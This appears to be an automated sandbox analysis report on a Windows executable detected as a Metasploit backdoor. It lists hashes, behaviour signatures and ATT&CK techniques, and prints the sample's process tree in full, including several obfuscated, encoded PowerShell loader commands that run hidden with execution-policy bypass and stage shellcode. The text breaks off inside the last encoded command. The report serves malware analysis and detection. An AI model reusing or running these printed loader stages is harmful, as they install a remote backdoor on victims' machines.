metasploit | 84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4

General

Target

84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe
Size

421KB
MD5

131270fa068900e6e40c53dd02c528bd
SHA1

f6cbd3bee1ca34059160dfde399a9c1a484f3a98
SHA256

84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4
SHA512

5bd8184316b92757e498f8b2ec49066e1bbbc877d8d87ee6eed214f7f8a68af3b729cb0b3d86db5652c0861352ab7f8be8c944cc722555061803a10934e09e9c
SSDEEP

6144:Pgxu6xcGEWuNas5t38dX6p4098E4FU7kprPcnFOHuln+Otc+EkzI8jSejCE8aKPy:Pgg6xox5nD3FhuE/RdoM/LOuucLRr

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2360	pOWErSheLl.exe
108	powershell.exe
2784	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWErSheLl.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2360	pOWErSheLl.exe
108	powershell.exe
2784	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2360	pOWErSheLl.exe
Token: SeDebugPrivilege	108	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1928 wrote to memory of 2360	1928	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	31
PID 1928 wrote to memory of 2360	1928	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	31
PID 1928 wrote to memory of 2360	1928	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	31
PID 1928 wrote to memory of 2360	1928	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	31
PID 2360 wrote to memory of 108	2360	pOWErSheLl.exe	33
PID 2360 wrote to memory of 108	2360	pOWErSheLl.exe	33
PID 2360 wrote to memory of 108	2360	pOWErSheLl.exe	33
PID 2360 wrote to memory of 108	2360	pOWErSheLl.exe	33
PID 108 wrote to memory of 2784	108	powershell.exe	34
PID 108 wrote to memory of 2784	108	powershell.exe	34
PID 108 wrote to memory of 2784	108	powershell.exe	34
PID 108 wrote to memory of 2784	108	powershell.exe	34
PID 2784 wrote to memory of 2584	2784	powershell.exe	35
PID 2784 wrote to memory of 2584	2784	powershell.exe	35
PID 2784 wrote to memory of 2584	2784	powershell.exe	35
PID 2784 wrote to memory of 2584	2784	powershell.exe	35
PID 2584 wrote to memory of 2612	2584	csc.exe	36
PID 2584 wrote to memory of 2612	2584	csc.exe	36
PID 2584 wrote to memory of 2612	2584	csc.exe	36
PID 2584 wrote to memory of 2612	2584	csc.exe	36

C:\Users\Admin\AppData\Local\Temp\84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe
"C:\Users\Admin\AppData\Local\Temp\84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1928
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pOWErSheLl.exe
  pOWErSheLl -Wi hIDdEn -CoMMAN "(-jOin(('262828273720302033203420392035203220382035203120362030272d7265706c414345275c772b272c277b247b307d7d272d5245704c4163452720272c2727292d662765272c2762272c2772272c2774272c272d272c2761272c276c272c2773272c2769272c27762729206f623735534c53334c3758442033343b262828273820342036203720322031203920332031203520302034272d5245506c614365275c772b272c277b247b307d7d272d5265506c4143452720272c2727292d66276c272c2761272c2776272c2769272c2765272c2762272c2774272c272d272c2773272c27722729205939364171686e4b507573502031343b2e282e28277b317d7b307d272d6627436d272c2767272928277365542d5641272b27724961626c45272929205a704955564d7a396d6a6c6b2032343b2e2828273520312037203020382036203920322036203420332031272d5245706c414365275c772b272c277b247b307d7d272d7265706c6143652720272c2727292d66272d272c2765272c2769272c276c272c2762272c2773272c2761272c2774272c2776272c27722729206f6a74414777457841314d78282828282e28274745542d56417249272b274142272b276c452729206f623735534c53334c375844292e282776614c75272b276527292b3131292d41535b636861725d292e2827546f735472272b27696e4727292e496e766f6b6528292b2828282e28277b317d7b307d7b327d272d66276941272c276745742d566172272c27624c652729205939364171686e4b50757350292e282776614c272b2775272b274527292b3837292d41535b436861525d292e28277b337d7b317d7b327d7b347d7b307d272d662747272c2754272c275269272c27546f53272c274e27292e696e764f4b4528292b2828282e2828273820322033203620352039203420372039203020312032272d5245704c416365275c772b272c277b247b307d7d272d7245704c6143452720272c2727292d662762272c276c272c2765272c2774272c2772272c2776272c272d272c2769272c2767272c27612729205a704955564d7a396d6a6c6b292e282827332034203020322031272d7265506c416345275c772b272c277b247b307d7d272d7265706c6163652720272c2727292d66276c272c2765272c2775272c2776272c276127292b3735292d41535b434861725d292e28277b317d7b307d272d6627537452494e67272c27544f27292e696e564f4b452829293b706f7765727368656c6c202d4e4f6e694e544552614374202d6e6f4c4f474f202d4e4f70724f66202d77696e446f772068494464454e202d65584563755469204279506173732028262828273520342031203920382030203220362030203320372034272d7245504c614345275c772b272c277b247b307d7d272d5245506c4143452720272c2727292d662761272c2774272c2772272c2762272c2765272c2767272c2769272c276c272c2776272c272d2729206f6a74414777457841314d78292e282827302033203120322034272d7245504c416345275c772b272c277b247b307d7d272d5265704c4163652720272c2727292d662776272c276c272c2775272c2761272c276527292e2827744f5354272b2772272b27694e4727292e496e766f4b6528294a67416f414334414b41416e414563414a774172414363415177416e414373414a77424e414363414b51416f414363416577417741483041657741794148304165774178414830414a774174414759414a77427a414363414c41416e414755414a774173414363415a51425541433041646742684146494161514268414549416241416e41436b414b514167414559415151426e41466b416141417741476b414d4142444144634157674261414341414f514137414359414b41416e41484d415251425541433041566742684148494161514268414363414b77416e414549414a774172414363415441426c414363414b5141674146494161514178414645416341424b414777415a5142684148494164414243414341414d774179414473414c67416f414363416377426c414851414a774172414363414c514232414545414a7741724143634155674270414545415167416e414373414a77424d414363414b77416e414555414a7741704143414153774249414545416377424f4145494161514246414763415451424b41456f4149414133414473414a67416f4143634155774246414651414c51416e414373414a774257414545416367416e414373414a77424a414745415967424d414363414b77416e414755414a774170414341415251426141444d41625142364145304154514255414549415a67423341474d414b41416f414367414b41416d414367414a77423741444541665142374144414166514237414449416651416e414330415a67416e414851414c514232414363414c41416e414763415251416e414377414a77424241484941535142424147494154414246414363414b514167414559415151426e41466b416141417741476b414d414244414463415767426141436b414c67416f414367414a774179414341414d7741674144414149414130414341414d51416e4143304163674246414641415441426841474d415a51416e4146774164774172414363414c41416e414873414a4142374144414166514239414363414c51427941475541554142734145454159774246414363414941416e414377414a77416e41436b414c51426d414363416241416e414377414a77426c414363414c41416e414859414a774173414363415951416e414377414a774231414363414b51417241444d414e674170414330415151427a4146734151774249414545415567426441436b414c67416f414367414a77417a414341414d414167414451414941417a414341414e6741674144494149414131414341414d51416e414330416367426c414641416241424241474d415251416e4146774164774172414363414c41416e414873414a4142374144414166514239414363414c51427941455541634142734147454151774246414363414941416e414377414a77416e41436b414c51426d414363416277416e414377414a77426e414363414c41416e41476b414a774173414363416441416e414377414a77427a414363414c41416e414734414a774173414363416367416e41436b414c6742704145344156674276414573415251416f41436b414b77416f414367414b41416d414367414a7742484145554156414174414659415151427941476b414a7741724143634159514269414577415a51416e41436b414941425341476b414d514252414841415367427341475541595142794148514151674170414334414b41416e414873414d514239414873414d414239414363414c51426d414363415a51416e414377414a7742324147454154414231414363414b514172414459414f51417041433041595142544146734151774249414745416367426441436b414c67416f414363416577417741483041657741784148304165774179414830416577417a414830414a774174414759414a774230414538414a774173414363416377416e414377414a774230414849416151424f414363414c41416e414563414a774170414334415351424f414659415477424c414555414b414170414373414b41416f414367414a67416f414359414b41416f414363414d6741674144454149414177414363414c514279414555416341424d41474541517742464143634158414233414373414a774173414363416577416b414873414d414239414830414a774174414849415a514277414777415951426a414755414a774167414363414c41416e414363414b514174414759414a774274414363414c41416e41474d414a774173414363415a77416e41436b414b41416e414563415a5142554143304164674242414363414b77416e4146494153514268414549414a774172414363416241416e414373414a77426c414363414b5141704143414153774249414545416377424f4145494161514246414763415451424b41456f414b514175414367414a7742324147454162414231414555414a774170414373414f51417941436b414c51426841464d415777426a4147674159514279414630414b514175414367414a774230414538414a7741724143634155774255414849414a774172414363415351416e414373414a774275414563414a774170414334415351424f4148594162774272414755414b41417041436b414f774251414738416477426c414849416377426f414555416241424d414341414c5142754145384154674270414534415641426c414341414c51424f414738415441427641456341627741674143304162674276414841415567427641455941535141674143304156774167414767416151426b414551415251424f414341414c514246414667415a51426a414655415641416741454941575142774147454155774254414341414b414175414367414a77423741444141665142374144454166514237414449416651416e414330415a67416e41476341525142554143304156674242414649416151416e414377414a774268414749416241416e414377414a77426c414363414b514167414555415767417a414730416567424e4145304156414243414759416477426a41436b414c67416f414363416577417941483041657741774148304165774178414830414a774174414759414a774268414777414a774173414363415651426c414363414c41416e414859414a774170414334414b41416e414873414d514239414873414d674239414873414d414239414363414c51426d414363416267426e414363414c41416e4146514154774254414851414a7741734143634155674270414363414b51417541476b41546742324147384161774246414367414b51416f41467341597742494145454155674262414630415851416f414367415777426a41476741515142794146734158514264414367414c67416f414363416577417841483041657741794148304165774177414830416577417a414830414a774174414759414a774244414363414c41416e4147344152514233414330415477426941476f414a774173414363415a51416e414377414a774255414363414b514167414367414a77424f4147554156414175414863414a774172414363415a51424341474d41624142704147554162674255414363414b514170414334414b41416e41475141547742334145344162414250414363414b77416e414745415a4142544148514163674270414363414b77416e414734414a774172414363415a77416e41436b414c67424a4147344164674250414773415a51416f414351415a514275414859414f6742304147554162514277414373414a7742634148594165514235414849415441425241465541655142524146494154674249414363414b514170414877414a514237414351415a67424f41476b416341424c414573415977427641446341515142774145304150514177414830416577416b414638414c51426941486741547742534143634151774134414751415441426c4148514155774234414667415a51424a414859414e674274414751414f51426b414551415567425a414649416451426d4147634163674245414551414a774262414351415a67424f41476b416341424c41457341597742764144634151514277414530414b774172414355414d6741334146304166514170414330416167427641476b416267416e414363414b514137414649415a514274414738416467426c41433041535142304147554162514167414351415a514275414859414f6742304147554162514277414363415841423241486b4165514279414577415551425641486b4155514253414534415341416e41413d3d'-spLIt'(?<=\G.{2})(?!$)')|%{[CONvERT]::('{0}{2}{1}'-f'T','Nt16','OI').INVoKE(($_),16)-as[cHar]}))|&('{2}{0}{3}{1}'-f'vOKE-e','ioN','in','xPreSS')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2360
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOniNTERaCt -noLOGO -NOprOf -winDow hIDdEN -eXEcuTi ByPass -ec JgAoAC4AKAAnAEcAJwArACcAQwAnACsAJwBNACcAKQAoACcAewAwAH0AewAyAH0AewAxAH0AJwAtAGYAJwBzACcALAAnAGUAJwAsACcAZQBUAC0AdgBhAFIAaQBhAEIAbAAnACkAKQAgAEYAQQBnAFkAaAAwAGkAMABDADcAWgBaACAAOQA7ACYAKAAnAHMARQBUAC0AVgBhAHIAaQBhACcAKwAnAEIAJwArACcATABlACcAKQAgAFIAaQAxAFEAcABKAGwAZQBhAHIAdABCACAAMwAyADsALgAoACcAcwBlAHQAJwArACcALQB2AEEAJwArACcAUgBpAEEAQgAnACsAJwBMACcAKwAnAEUAJwApACAASwBIAEEAcwBOAEIAaQBFAGcATQBKAEoAIAA3ADsAJgAoACcAUwBFAFQALQAnACsAJwBWAEEAcgAnACsAJwBJAGEAYgBMACcAKwAnAGUAJwApACAARQBaADMAbQB6AE0ATQBUAEIAZgB3AGMAKAAoACgAKAAmACgAJwB7ADEAfQB7ADAAfQB7ADIAfQAnAC0AZgAnAHQALQB2ACcALAAnAGcARQAnACwAJwBBAHIASQBBAGIATABFACcAKQAgAEYAQQBnAFkAaAAwAGkAMABDADcAWgBaACkALgAoACgAJwAyACAAMwAgADAAIAA0ACAAMQAnAC0AcgBFAFAATABhAGMAZQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQByAGUAUABsAEEAYwBFACcAIAAnACwAJwAnACkALQBmACcAbAAnACwAJwBlACcALAAnAHYAJwAsACcAYQAnACwAJwB1ACcAKQArADMANgApAC0AQQBzAFsAQwBIAEEAUgBdACkALgAoACgAJwAzACAAMAAgADQAIAAzACAANgAgADIAIAA1ACAAMQAnAC0AcgBlAFAAbABBAGMARQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQByAEUAcABsAGEAQwBFACcAIAAnACwAJwAnACkALQBmACcAbwAnACwAJwBnACcALAAnAGkAJwAsACcAdAAnACwAJwBzACcALAAnAG4AJwAsACcAcgAnACkALgBpAE4AVgBvAEsARQAoACkAKwAoACgAKAAmACgAJwBHAEUAVAAtAFYAQQByAGkAJwArACcAYQBiAEwAZQAnACkAIABSAGkAMQBRAHAASgBsAGUAYQByAHQAQgApAC4AKAAnAHsAMQB9AHsAMAB9ACcALQBmACcAZQAnACwAJwB2AGEATAB1ACcAKQArADYAOQApAC0AYQBTAFsAQwBIAGEAcgBdACkALgAoACcAewAwAH0AewAxAH0AewAyAH0AewAzAH0AJwAtAGYAJwB0AE8AJwAsACcAcwAnACwAJwB0AHIAaQBOACcALAAnAEcAJwApAC4ASQBOAFYATwBLAEUAKAApACsAKAAoACgAJgAoACYAKAAoACcAMgAgADEAIAAwACcALQByAEUAcABMAGEAQwBFACcAXAB3ACsAJwAsACcAewAkAHsAMAB9AH0AJwAtAHIAZQBwAGwAYQBjAGUAJwAgACcALAAnACcAKQAtAGYAJwBtACcALAAnAGMAJwAsACcAZwAnACkAKAAnAEcAZQBUAC0AdgBBACcAKwAnAFIASQBhAEIAJwArACcAbAAnACsAJwBlACcAKQApACAASwBIAEEAcwBOAEIAaQBFAGcATQBKAEoAKQAuACgAJwB2AGEAbAB1AEUAJwApACsAOQAyACkALQBhAFMAWwBjAGgAYQByAF0AKQAuACgAJwB0AE8AJwArACcAUwBUAHIAJwArACcASQAnACsAJwBuAEcAJwApAC4ASQBOAHYAbwBrAGUAKAApACkAOwBQAG8AdwBlAHIAcwBoAEUAbABMACAALQBuAE8ATgBpAE4AVABlACAALQBOAG8ATABvAEcAbwAgAC0AbgBvAHAAUgBvAEYASQAgAC0AVwAgAGgAaQBkAEQARQBOACAALQBFAFgAZQBjAFUAVAAgAEIAWQBwAGEAUwBTACAAKAAuACgAJwB7ADAAfQB7ADEAfQB7ADIAfQAnAC0AZgAnAGcARQBUAC0AVgBBAFIAaQAnACwAJwBhAGIAbAAnACwAJwBlACcAKQAgAEUAWgAzAG0AegBNAE0AVABCAGYAdwBjACkALgAoACcAewAyAH0AewAwAH0AewAxAH0AJwAtAGYAJwBhAGwAJwAsACcAVQBlACcALAAnAHYAJwApAC4AKAAnAHsAMQB9AHsAMgB9AHsAMAB9ACcALQBmACcAbgBnACcALAAnAFQATwBTAHQAJwAsACcAUgBpACcAKQAuAGkATgB2AG8AawBFACgAKQAoAFsAYwBIAEEAUgBbAF0AXQAoACgAWwBjAGgAQQByAFsAXQBdACgALgAoACcAewAxAH0AewAyAH0AewAwAH0AewAzAH0AJwAtAGYAJwBDACcALAAnAG4ARQB3AC0ATwBiAGoAJwAsACcAZQAnACwAJwBUACcAKQAgACgAJwBOAGUAVAAuAHcAJwArACcAZQBCAGMAbABpAGUAbgBUACcAKQApAC4AKAAnAGQATwB3AE4AbABPACcAKwAnAGEAZABTAHQAcgBpACcAKwAnAG4AJwArACcAZwAnACkALgBJAG4AdgBPAGsAZQAoACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcAHYAeQB5AHIATABRAFUAeQBRAFIATgBIACcAKQApAHwAJQB7ACQAZgBOAGkAcABLAEsAYwBvADcAQQBwAE0APQAwAH0AewAkAF8ALQBiAHgATwBSACcAQwA4AGQATABlAHQAUwB4AFgAZQBJAHYANgBtAGQAOQBkAEQAUgBZAFIAdQBmAGcAcgBEAEQAJwBbACQAZgBOAGkAcABLAEsAYwBvADcAQQBwAE0AKwArACUAMgA3AF0AfQApAC0AagBvAGkAbgAnACcAKQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAZQBuAHYAOgB0AGUAbQBwACcAXAB2AHkAeQByAEwAUQBVAHkAUQBSAE4ASAAnAA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:108
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nONiNTe -NoLoGo -nopRoFI -W hidDEN -EXecUT BYpaSS -ec KAAtAGoAbwBJAG4AKAAoACcAMgA0ADUANwA2AGEANQA2ADUAMAA0AGEANgAzADUAMgA3ADAAMwA2ADQAZgA2ADUAMwAwADMAZAAyADYAMgA4ADIANgAyADgAMgA3ADcAYgAzADAANwBkADIANwAyAGQANgA2ADIANwA0ADcANgAzADYAZAAyADcAMgA5ADIAOAAyADgAMgA3ADMAMwAyADAAMwAwADIAMAAzADAAMgAwADMANAAyADAAMwAxADIAMAAzADUAMgAwADMANgAyADAAMwAyADIANwAyAGQANQAyADQANQA1ADAANgBjADQAMQA0ADMANAA1ADIANwA1AGMANwA3ADIAYgAyADcAMgBjADIANwA3AGIAMgA0ADcAYgAzADAANwBkADcAZAAyADcAMgBkADUAMgA2ADUANwAwADQAYwA2ADEANAAzADQANQAyADcAMgAwADIANwAyAGMAMgA3ADIANwAyADkAMgBkADYANgAyADcANgA0ADIANwAyAGMAMgA3ADcANAAyADcAMgBjADIANwA2ADUAMgA3ADIAYwAyADcANgAxADIANwAyAGMAMgA3ADIAZAAyADcAMgBjADIANwA3ADkAMgA3ADIAYwAyADcANwAwADIANwAyADkAMgA5ADIAMAAyAGQANgBkADIAMAAyADcANQBiADQANAA2AGMANgBjADQAOQA2AGQANwAwADYAZgA3ADIANwA0ADIAOAAyADIANgBiADYANQA3ADIANgBlADYANQA2AGMAMwAzADMAMgAyAGUANgA0ADYAYwA2AGMAMgAyADIAOQA1AGQAMgAwADcAMAA3ADUANgAyADYAYwA2ADkANgAzADIAMAA3ADMANwA0ADYAMQA3ADQANgA5ADYAMwAyADAANgA1ADcAOAA3ADQANgA1ADcAMgA2AGUAMgAwADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA1ADYANgA5ADcAMgA3ADQANwA1ADYAMQA2AGMANAAxADYAYwA2AGMANgBmADYAMwAyADgANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAYwA3ADAANAAxADYANAA2ADQANwAyADYANQA3ADMANwAzADIAYwAyADAANwA1ADYAOQA2AGUANwA0ADIAMAA2ADQANwA3ADUAMwA2ADkANwBhADYANQAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgA2ADYAYwA0ADEANgBjADYAYwA2AGYANgAzADYAMQA3ADQANgA5ADYAZgA2AGUANQA0ADcAOQA3ADAANgA1ADIAYwAyADAANwA1ADYAOQA2AGUANwA0ADIAMAA2ADYANgBjADUAMAA3ADIANgBmADcANAA2ADUANgAzADcANAAyADkAMwBiADUAYgA0ADQANgBjADYAYwA0ADkANgBkADcAMAA2AGYANwAyADcANAAyADgAMgAyADYAYgA2ADUANwAyADYAZQA2ADUANgBjADMAMwAzADIAMgBlADYANAA2AGMANgBjADIAMgAyADkANQBkADIAMAA3ADAANwA1ADYAMgA2AGMANgA5ADYAMwAyADAANwAzADcANAA2ADEANwA0ADYAOQA2ADMAMgAwADYANQA3ADgANwA0ADYANQA3ADIANgBlADIAMAA0ADkANgBlADcANAA1ADAANwA0ADcAMgAyADAANAAzADcAMgA2ADUANgAxADcANAA2ADUANQA0ADYAOAA3ADIANgA1ADYAMQA2ADQAMgA4ADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA2AGMANwAwADUANAA2ADgANwAyADYANQA2ADEANgA0ADQAMQA3ADQANwA0ADcAMgA2ADkANgAyADcANQA3ADQANgA1ADcAMwAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgA0ADcANwA1ADMANwA0ADYAMQA2ADMANgBiADUAMwA2ADkANwBhADYANQAyAGMAMgAwADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA2AGMANwAwADUAMwA3ADQANgAxADcAMgA3ADQANAAxADYANAA2ADQANwAyADYANQA3ADMANwAzADIAYwAyADAANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAYwA3ADAANQAwADYAMQA3ADIANgAxADYAZAA2ADUANwA0ADYANQA3ADIAMgBjADIAMAA3ADUANgA5ADYAZQA3ADQAMgAwADYANAA3ADcANAAzADcAMgA2ADUANgAxADcANAA2ADkANgBmADYAZQA0ADYANgBjADYAMQA2ADcANwAzADIAYwAyADAANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAYwA3ADAANQA0ADYAOAA3ADIANgA1ADYAMQA2ADQANAA5ADYANAAyADkAMwBiADUAYgA0ADQANgBjADYAYwA0ADkANgBkADcAMAA2AGYANwAyADcANAAyADgAMgAyADYAZAA3ADMANwA2ADYAMwA3ADIANwA0ADIAZQA2ADQANgBjADYAYwAyADIAMgA5ADUAZAAyADAANwAwADcANQA2ADIANgBjADYAOQA2ADMAMgAwADcAMwA3ADQANgAxADcANAA2ADkANgAzADIAMAA2ADUANwA4ADcANAA2ADUANwAyADYAZQAyADAANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAZAA2ADUANgBkADcAMwA2ADUANwA0ADIAOAA0ADkANgBlADcANAA1ADAANwA0ADcAMgAyADAANgA0ADYANQA3ADMANwA0ADIAYwAyADAANwA1ADYAOQA2AGUANwA0ADIAMAA3ADMANwAyADYAMwAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgAzADYAZgA3ADUANgBlADcANAAyADkAMwBiADIANwAyADAAMgBkADYAZQA2ADEANgBkADYANQAyADAAMgA3ADUANwA2ADkANgBlADMAMwAzADIAMgA3ADIAMAAyAGQANgBlADcAMwAyADAANQA3ADYAOQA2AGUAMwAzADMAMgA0ADYANwA1ADYAZQA2ADMANwA0ADYAOQA2AGYANgBlADcAMwAyADAAMgBkADcAMAA2ADEANwAzADMAYgA1AGIANgAyADUAOQA1ADQANgA1ADUAYgA1AGQANQBkADIANAA2ADUANwA3ADcAMAA2AGMANgA0ADQAMwAzADAANgAyADUAOQA2ADkANwAwADMAMwAzAGQAMwAwADcAOAA2ADYANgAzADIAYwAzADAANwA4ADYANQAzADgAMgBjADMAMAA3ADgAMwA4ADMAMgAyAGMAMwAwADcAOAAzADAAMwAwADIAYwAzADAANwA4ADMAMAAzADAAMgBjADMAMAA3ADgAMwAwADMAMAAyAGMAMwAwADcAOAAzADYAMwAwADIAYwAzADAANwA4ADMAOAAzADkAMgBjADMAMAA3ADgANgA1ADMANQAyAGMAMwAwADcAOAAzADMAMwAxADIAYwAzADAANwA4ADYAMwAzADAAMgBjADMAMAA3ADgAMwA2ADMANAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADAAMgBjADMAMAA3ADgAMwAzADMAMAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADIAMgBjADMAMAA3ADgAMwAwADYAMwAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADIAMgBjADMAMAA3ADgAMwAxADMANAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANwAzADIAMgBjADMAMAA3ADgAMwAyADMAOAAyAGMAMwAwADcAOAAzADAANgA2ADIAYwAzADAANwA4ADYAMgAzADcAMgBjADMAMAA3ADgAMwA0ADYAMQAyAGMAMwAwADcAOAAzADIAMwA2ADIAYwAzADAANwA4ADMAMwAzADEAMgBjADMAMAA3ADgANgA2ADYANgAyAGMAMwAwADcAOAA2ADEANgAzADIAYwAzADAANwA4ADMAMwA2ADMAMgBjADMAMAA3ADgAMwA2ADMAMQAyAGMAMwAwADcAOAAzADcANgAzADIAYwAzADAANwA4ADMAMAAzADIAMgBjADMAMAA3ADgAMwAyADYAMwAyAGMAMwAwADcAOAAzADIAMwAwADIAYwAzADAANwA4ADYAMwAzADEAMgBjADMAMAA3ADgANgAzADYANgAyAGMAMwAwADcAOAAzADAANgA0ADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgAzADMANwAyAGMAMwAwADcAOAA2ADUAMwAyADIAYwAzADAANwA4ADYANgAzADIAMgBjADMAMAA3ADgAMwA1ADMAMgAyAGMAMwAwADcAOAAzADUAMwA3ADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA1ADMAMgAyAGMAMwAwADcAOAAzADEAMwAwADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA0ADYAMQAyAGMAMwAwADcAOAAzADMANgAzADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA0ADYAMwAyAGMAMwAwADcAOAAzADEAMwAxADIAYwAzADAANwA4ADMANwAzADgAMgBjADMAMAA3ADgANgA1ADMAMwAyAGMAMwAwADcAOAAzADQAMwA4ADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMQAyAGMAMwAwADcAOAAzADUAMwAxADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA1ADMAOQAyAGMAMwAwADcAOAAzADIAMwAwADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMwAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANAAzADkAMgBjADMAMAA3ADgAMwAxADMAOAAyAGMAMwAwADcAOAA2ADUAMwAzADIAYwAzADAANwA4ADMAMwA2ADEAMgBjADMAMAA3ADgAMwA0ADMAOQAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMAMwAzADQAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADAAMwAxADIAYwAzADAANwA4ADYANAAzADYAMgBjADMAMAA3ADgAMwAzADMAMQAyAGMAMwAwADcAOAA2ADYANgA2ADIAYwAzADAANwA4ADYAMQA2ADMAMgBjADMAMAA3ADgANgAzADMAMQAyAGMAMwAwADcAOAA2ADMANgA2ADIAYwAzADAANwA4ADMAMAA2ADQAMgBjADMAMAA3ADgAMwAwADMAMQAyAGMAMwAwADcAOAA2ADMAMwA3ADIAYwAzADAANwA4ADMAMwAzADgAMgBjADMAMAA3ADgANgA1ADMAMAAyAGMAMwAwADcAOAAzADcAMwA1ADIAYwAzADAANwA4ADYANgAzADYAMgBjADMAMAA3ADgAMwAwADMAMwAyAGMAMwAwADcAOAAzADcANgA0ADIAYwAzADAANwA4ADYANgAzADgAMgBjADMAMAA3ADgAMwAzADYAMgAyAGMAMwAwADcAOAAzADcANgA0ADIAYwAzADAANwA4ADMAMgAzADQAMgBjADMAMAA3ADgAMwA3ADMANQAyAGMAMwAwADcAOAA2ADUAMwA0ADIAYwAzADAANwA4ADMANQAzADgAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADUAMwA4ADIAYwAzADAANwA4ADMAMgAzADQAMgBjADMAMAA3ADgAMwAwADMAMQAyAGMAMwAwADcAOAA2ADQAMwAzADIAYwAzADAANwA4ADMANgAzADYAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADAANgAzADIAYwAzADAANwA4ADMANAA2ADIAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADUAMwA4ADIAYwAzADAANwA4ADMAMQA2ADMAMgBjADMAMAA3ADgAMwAwADMAMQAyAGMAMwAwADcAOAA2ADQAMwAzADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwAwADMANAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMAAyAGMAMwAwADcAOAAzADgAMwA5ADIAYwAzADAANwA4ADMANAAzADQAMgBjADMAMAA3ADgAMwAyADMANAAyAGMAMwAwADc